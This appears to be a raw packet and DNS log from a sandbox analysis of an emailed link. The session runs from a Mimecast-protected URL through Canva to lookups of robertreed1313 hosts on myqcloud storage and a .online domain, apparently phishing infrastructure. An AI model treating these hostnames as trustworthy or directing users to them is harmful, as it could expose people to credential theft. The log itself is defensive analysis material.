                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.286370993 CET44349841104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.286632061 CET49841443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.286880970 CET49841443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.286895037 CET44349841104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.295722961 CET44349829104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.299657106 CET44349829104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.299913883 CET49829443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.299932003 CET44349829104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.307702065 CET44349829104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.314990044 CET44349829104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.315107107 CET44349829104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.315129995 CET49829443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.315146923 CET44349829104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.322829962 CET44349829104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.330044031 CET49829443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.330071926 CET44349829104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.337877989 CET44349829104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.338162899 CET44349829104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.338582039 CET49829443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.338597059 CET44349829104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.345820904 CET44349829104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.346472979 CET49829443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.346498966 CET44349829104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.352345943 CET49829443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.353461981 CET44349829104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.360955000 CET44349829104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.361087084 CET44349829104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.362363100 CET49829443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.366583109 CET49829443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.366607904 CET44349829104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.415707111 CET49842443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.415755033 CET44349842104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.418910980 CET49842443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.424704075 CET49842443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.424722910 CET44349842104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:22.322190046 CET192.168.2.121.1.1.10x9728Standard query (0)url.us.m.mimecastprotect.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:22.322478056 CET192.168.2.121.1.1.10xe311Standard query (0)url.us.m.mimecastprotect.com65IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:24.721200943 CET192.168.2.121.1.1.10x16d6Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:24.721520901 CET192.168.2.121.1.1.10x7212Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:26.090025902 CET192.168.2.121.1.1.10xa2e0Standard query (0)www.canva.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:26.090362072 CET192.168.2.121.1.1.10x1daStandard query (0)www.canva.com65IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:28.202215910 CET192.168.2.121.1.1.10xc1b9Standard query (0)static.canva.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:28.202358007 CET192.168.2.121.1.1.10x75fdStandard query (0)static.canva.com65IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.232974052 CET192.168.2.121.1.1.10xaeecStandard query (0)static.canva.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.233690023 CET192.168.2.121.1.1.10x1a5eStandard query (0)static.canva.com65IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.649370909 CET192.168.2.121.1.1.10xdf4bStandard query (0)o13855.ingest.sentry.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.649538040 CET192.168.2.121.1.1.10xcd11Standard query (0)o13855.ingest.sentry.io65IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:31.254710913 CET192.168.2.121.1.1.10xe442Standard query (0)static.cloudflareinsights.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:31.254933119 CET192.168.2.121.1.1.10xb01eStandard query (0)static.cloudflareinsights.com65IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.655307055 CET192.168.2.121.1.1.10x36Standard query (0)chunk-composing.canva.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.655493975 CET192.168.2.121.1.1.10x4244Standard query (0)chunk-composing.canva.com65IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.670439005 CET192.168.2.121.1.1.10xca94Standard query (0)o13855.ingest.sentry.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.670809984 CET192.168.2.121.1.1.10x7110Standard query (0)o13855.ingest.sentry.io65IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:33.401401043 CET192.168.2.121.1.1.10x12ceStandard query (0)static.cloudflareinsights.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:33.402244091 CET192.168.2.121.1.1.10x28caStandard query (0)static.cloudflareinsights.com65IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.147403002 CET192.168.2.121.1.1.10x5fbStandard query (0)chunk-composing.canva.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.147552967 CET192.168.2.121.1.1.10x761fStandard query (0)chunk-composing.canva.com65IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.332207918 CET192.168.2.121.1.1.10x3b89Standard query (0)www.canva.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.332623959 CET192.168.2.121.1.1.10x7dbdStandard query (0)www.canva.com65IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.730935097 CET192.168.2.121.1.1.10xd7e6Standard query (0)font-public.canva.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.731082916 CET192.168.2.121.1.1.10xe3a0Standard query (0)font-public.canva.com65IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.062880039 CET192.168.2.121.1.1.10x1806Standard query (0)media.canva.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.063010931 CET192.168.2.121.1.1.10xdb00Standard query (0)media.canva.com65IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.055808067 CET192.168.2.121.1.1.10x56f6Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.055979967 CET192.168.2.121.1.1.10x2a6bStandard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.111548901 CET192.168.2.121.1.1.10x1799Standard query (0)telemetry.canva.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.111745119 CET192.168.2.121.1.1.10x57cdStandard query (0)telemetry.canva.com65IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.139889956 CET192.168.2.121.1.1.10xb985Standard query (0)media.canva.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.140023947 CET192.168.2.121.1.1.10xf446Standard query (0)media.canva.com65IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:51.895853043 CET192.168.2.121.1.1.10x881aStandard query (0)cdn.metadata.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:51.896054983 CET192.168.2.121.1.1.10x910bStandard query (0)cdn.metadata.io65IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:51.950891972 CET192.168.2.121.1.1.10x2ba3Standard query (0)sp.analytics.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:51.951097965 CET192.168.2.121.1.1.10x1492Standard query (0)sp.analytics.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:51.951289892 CET192.168.2.121.1.1.10x16e2Standard query (0)p.tvpixel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:51.951409101 CET192.168.2.121.1.1.10xc50bStandard query (0)p.tvpixel.com65IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:51.952075005 CET192.168.2.121.1.1.10xb2a5Standard query (0)sb.scorecardresearch.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:51.952224970 CET192.168.2.121.1.1.10x52d9Standard query (0)sb.scorecardresearch.com65IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:54.116286039 CET192.168.2.121.1.1.10xd3a7Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:54.116430044 CET192.168.2.121.1.1.10xf431Standard query (0)api.ipify.org65IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:54.126113892 CET192.168.2.121.1.1.10x77beStandard query (0)cdn.metadata.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:54.126372099 CET192.168.2.121.1.1.10xe935Standard query (0)cdn.metadata.io65IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:54.176691055 CET192.168.2.121.1.1.10xac21Standard query (0)sp.analytics.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:54.177047014 CET192.168.2.121.1.1.10x932cStandard query (0)sp.analytics.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:54.583566904 CET192.168.2.121.1.1.10x817cStandard query (0)p.tvpixel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:54.583775997 CET192.168.2.121.1.1.10xd8b5Standard query (0)p.tvpixel.com65IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:55.457283974 CET192.168.2.121.1.1.10xf50fStandard query (0)ct.canva.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:55.457474947 CET192.168.2.121.1.1.10x7e1Standard query (0)ct.canva.com65IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:56.052911043 CET192.168.2.121.1.1.10x465fStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:56.053108931 CET192.168.2.121.1.1.10x8e54Standard query (0)api.ipify.org65IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:57.383764029 CET192.168.2.121.1.1.10x6480Standard query (0)sb.scorecardresearch.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:57.383918047 CET192.168.2.121.1.1.10x2d80Standard query (0)sb.scorecardresearch.com65IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:57.664017916 CET192.168.2.121.1.1.10xfStandard query (0)ad.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:57.664191961 CET192.168.2.121.1.1.10x446cStandard query (0)ad.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:57.665628910 CET192.168.2.121.1.1.10x23bfStandard query (0)ct.canva.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:57.665827036 CET192.168.2.121.1.1.10x7b06Standard query (0)ct.canva.com65IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:59.642601967 CET192.168.2.121.1.1.10xd787Standard query (0)6aqz4yjq5fbp5equ2o4i3rbsxwj5ecr4j3mtsil7cz3qppu3tlra.ar-io.devA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:59.642843008 CET192.168.2.121.1.1.10x8ee4Standard query (0)6aqz4yjq5fbp5equ2o4i3rbsxwj5ecr4j3mtsil7cz3qppu3tlra.ar-io.dev65IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:00.384812117 CET192.168.2.121.1.1.10xa383Standard query (0)ad.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:00.384952068 CET192.168.2.121.1.1.10x9b2eStandard query (0)ad.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:00.502944946 CET192.168.2.121.1.1.10xbefeStandard query (0)adservice.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:00.503099918 CET192.168.2.121.1.1.10x2a1eStandard query (0)adservice.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:00.506489038 CET192.168.2.121.1.1.10x5ed1Standard query (0)googleads.g.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:00.506653070 CET192.168.2.121.1.1.10xcf3bStandard query (0)googleads.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:02.860821009 CET192.168.2.121.1.1.10xdc5cStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:02.860966921 CET192.168.2.121.1.1.10x5499Standard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:02.862447977 CET192.168.2.121.1.1.10x17d1Standard query (0)use.fontawesome.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:02.862653971 CET192.168.2.121.1.1.10x5b31Standard query (0)use.fontawesome.com65IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:02.863329887 CET192.168.2.121.1.1.10x1ff9Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:02.863507032 CET192.168.2.121.1.1.10x3ff3Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:02.864047050 CET192.168.2.121.1.1.10x5d9eStandard query (0)maxcdn.bootstrapcdn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:02.864248991 CET192.168.2.121.1.1.10xeae1Standard query (0)maxcdn.bootstrapcdn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:02.864722967 CET192.168.2.121.1.1.10x924dStandard query (0)robertreed1313-1323985617.cos.na-ashburn.myqcloud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:02.864861012 CET192.168.2.121.1.1.10xac8fStandard query (0)robertreed1313-1323985617.cos.na-ashburn.myqcloud.com65IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:03.352467060 CET192.168.2.121.1.1.10x56c1Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:03.352613926 CET192.168.2.121.1.1.10xde2Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:03.460720062 CET192.168.2.121.1.1.10x15deStandard query (0)adservice.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:03.460864067 CET192.168.2.121.1.1.10x3f06Standard query (0)adservice.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:03.881381989 CET192.168.2.121.1.1.10xb590Standard query (0)robertreed1313-1323985617.cos.na-ashburn.myqcloud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:05.064301014 CET192.168.2.121.1.1.10x98d5Standard query (0)maxcdn.bootstrapcdn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:05.064472914 CET192.168.2.121.1.1.10x5546Standard query (0)maxcdn.bootstrapcdn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:05.126966000 CET192.168.2.121.1.1.10x3cdfStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:05.127108097 CET192.168.2.121.1.1.10x37a6Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:05.168076038 CET192.168.2.121.1.1.10x1334Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:05.168287039 CET192.168.2.121.1.1.10x41f4Standard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:06.098423004 CET192.168.2.121.1.1.10xb0b8Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:06.098562002 CET192.168.2.121.1.1.10x8cebStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:07.797343969 CET192.168.2.121.1.1.10x23d6Standard query (0)robertreed1313-1323985617.cos.na-ashburn.myqcloud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:07.797489882 CET192.168.2.121.1.1.10xb757Standard query (0)robertreed1313-1323985617.cos.na-ashburn.myqcloud.com65IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:07.808809042 CET192.168.2.121.1.1.10xb27eStandard query (0)robertreed1313.onlineA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:07.808971882 CET192.168.2.121.1.1.10xfd61Standard query (0)robertreed1313.online65IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:11.093319893 CET192.168.2.121.1.1.10xf1f1Standard query (0)robertreed1313.onlineA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:02:11.093482971 CET192.168.2.121.1.1.10xe365Standard query (0)robertreed1313.online65IN (0x0001)false
                                                                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:22.556507111 CET1.1.1.1192.168.2.120x9728No error (0)url.us.m.mimecastprotect.com205.139.111.12A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:22.556507111 CET1.1.1.1192.168.2.120x9728No error (0)url.us.m.mimecastprotect.com207.211.31.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:22.556507111 CET1.1.1.1192.168.2.120x9728No error (0)url.us.m.mimecastprotect.com205.139.111.117A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:22.556507111 CET1.1.1.1192.168.2.120x9728No error (0)url.us.m.mimecastprotect.com205.139.111.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:22.556507111 CET1.1.1.1192.168.2.120x9728No error (0)url.us.m.mimecastprotect.com207.211.31.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:22.556507111 CET1.1.1.1192.168.2.120x9728No error (0)url.us.m.mimecastprotect.com207.211.31.64A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:24.858736992 CET1.1.1.1192.168.2.120x7212No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:24.858886957 CET1.1.1.1192.168.2.120x16d6No error (0)www.google.com142.250.181.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:26.231347084 CET1.1.1.1192.168.2.120xa2e0No error (0)www.canva.com104.16.102.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:26.231347084 CET1.1.1.1192.168.2.120xa2e0No error (0)www.canva.com104.16.103.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:26.232503891 CET1.1.1.1192.168.2.120x1daNo error (0)www.canva.com65IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:28.340821028 CET1.1.1.1192.168.2.120x75fdNo error (0)static.canva.com65IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:28.340847015 CET1.1.1.1192.168.2.120xc1b9No error (0)static.canva.com104.16.103.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:28.340847015 CET1.1.1.1192.168.2.120xc1b9No error (0)static.canva.com104.16.102.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.372313976 CET1.1.1.1192.168.2.120x1a5eNo error (0)static.canva.com65IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.374525070 CET1.1.1.1192.168.2.120xaeecNo error (0)static.canva.com104.16.102.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.374525070 CET1.1.1.1192.168.2.120xaeecNo error (0)static.canva.com104.16.103.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.802438974 CET1.1.1.1192.168.2.120xdf4bNo error (0)o13855.ingest.sentry.io34.120.195.249A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:31.391665936 CET1.1.1.1192.168.2.120xe442No error (0)static.cloudflareinsights.com104.16.79.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:31.391665936 CET1.1.1.1192.168.2.120xe442No error (0)static.cloudflareinsights.com104.16.80.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:31.391834974 CET1.1.1.1192.168.2.120xb01eNo error (0)static.cloudflareinsights.com65IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.796226025 CET1.1.1.1192.168.2.120x4244No error (0)chunk-composing.canva.com65IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.797228098 CET1.1.1.1192.168.2.120x36No error (0)chunk-composing.canva.com104.16.102.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.797228098 CET1.1.1.1192.168.2.120x36No error (0)chunk-composing.canva.com104.16.103.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:32.813574076 CET1.1.1.1192.168.2.120xca94No error (0)o13855.ingest.sentry.io34.120.195.249A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:33.552155972 CET1.1.1.1192.168.2.120x28caNo error (0)static.cloudflareinsights.com65IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:33.554310083 CET1.1.1.1192.168.2.120x12ceNo error (0)static.cloudflareinsights.com104.16.79.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:33.554310083 CET1.1.1.1192.168.2.120x12ceNo error (0)static.cloudflareinsights.com104.16.80.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.287754059 CET1.1.1.1192.168.2.120x761fNo error (0)chunk-composing.canva.com65IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.290039062 CET1.1.1.1192.168.2.120x5fbNo error (0)chunk-composing.canva.com104.16.102.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.290039062 CET1.1.1.1192.168.2.120x5fbNo error (0)chunk-composing.canva.com104.16.103.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.469619036 CET1.1.1.1192.168.2.120x7dbdNo error (0)www.canva.com65IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.470163107 CET1.1.1.1192.168.2.120x3b89No error (0)www.canva.com104.16.102.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.470163107 CET1.1.1.1192.168.2.120x3b89No error (0)www.canva.com104.16.103.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.998893976 CET1.1.1.1192.168.2.120xd7e6No error (0)font-public.canva.com104.16.103.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.998893976 CET1.1.1.1192.168.2.120xd7e6No error (0)font-public.canva.com104.16.102.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:43.998934984 CET1.1.1.1192.168.2.120xe3a0No error (0)font-public.canva.com65IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.202985048 CET1.1.1.1192.168.2.120xdb00No error (0)media.canva.com65IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.203145027 CET1.1.1.1192.168.2.120x1806No error (0)media.canva.com104.16.103.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.203145027 CET1.1.1.1192.168.2.120x1806No error (0)media.canva.com104.16.102.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.196470976 CET1.1.1.1192.168.2.120x56f6No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.249428988 CET1.1.1.1192.168.2.120x1799No error (0)telemetry.canva.com104.16.102.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.249428988 CET1.1.1.1192.168.2.120x1799No error (0)telemetry.canva.com104.16.103.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.249578953 CET1.1.1.1192.168.2.120x57cdNo error (0)telemetry.canva.com65IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.280028105 CET1.1.1.1192.168.2.120xb985No error (0)media.canva.com104.16.103.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.280028105 CET1.1.1.1192.168.2.120xb985No error (0)media.canva.com104.16.102.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:48.285842896 CET1.1.1.1192.168.2.120xf446No error (0)media.canva.com65IN (0x0001)false
